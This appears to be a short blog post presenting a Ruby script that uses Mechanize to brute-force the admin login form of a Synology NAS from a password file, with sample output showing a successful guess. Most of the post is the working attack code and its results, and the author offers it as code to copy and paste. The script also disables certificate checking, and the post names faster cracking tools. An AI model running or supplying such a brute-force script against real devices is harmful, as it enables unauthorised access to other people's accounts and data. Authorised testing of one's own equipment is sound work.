I decided I wanted to write my own bruteforcer for a Synology NAS I happen to have on hand. Now people commonly suggest using Nokogiri to interact and parse webpages. Thats all fine and dandy for the simpler/more straightforward webcode, but when you start getting into web2.0 stuff or if you just dont want to deal with it, I've found that Mechanize helps tremendously.
Below is the final code i came up with. It's fairly simple. It takes in a file called "passlist.txt" which will be the password dictionary file, and for every password in that file it will attempt a login to the login webpage. It will detect the returned response body for a success or failure. (this is mainly meant as a PoC, not as a tool)
require 'rubygems' require 'mechanize' #this script will brute force the web form login for a synology nas passwordlist = File.open("passlist.txt") agent = Mechanize.new{|a| a.verify_mode = OpenSSL::SSL::VERIFY_NONE #a.set_proxy('localhost',8080) } target = 'https://NASIPHere:5001/webman/index.cgi' user = 'admin' passwordlist.each do |password| page = agent.get target # Fill out the login form form = page.form_with :id => 'login-form' form.username = user form.passwd = password.chomp #this is important otherwise the newline will break the auth and everything fails result = form.submit case when result.body =~ /"success" : false/ then puts "Failure with #{password}" when result.body =~ /"success" : true/ then puts "SUCCESSFUL LOGIN WITH #{password}" else puts "Unknown response body when using \"#{password}\": #{result.body}" end end
Running the script yields the following output:
ruby synology-web-form-brute.rb
Failure with admin
SUCCESSFUL LOGIN WITH yoloswag
Failure with kittens
Again, this is not meant to be fancy/groundbreaking/or anything other than some code to copy and paste if you need to.
(There are a variety of tools that will do the same thing or a very similar attack much faster than this, such as hydra/medusa/burp/etc.)
No comments:
Post a Comment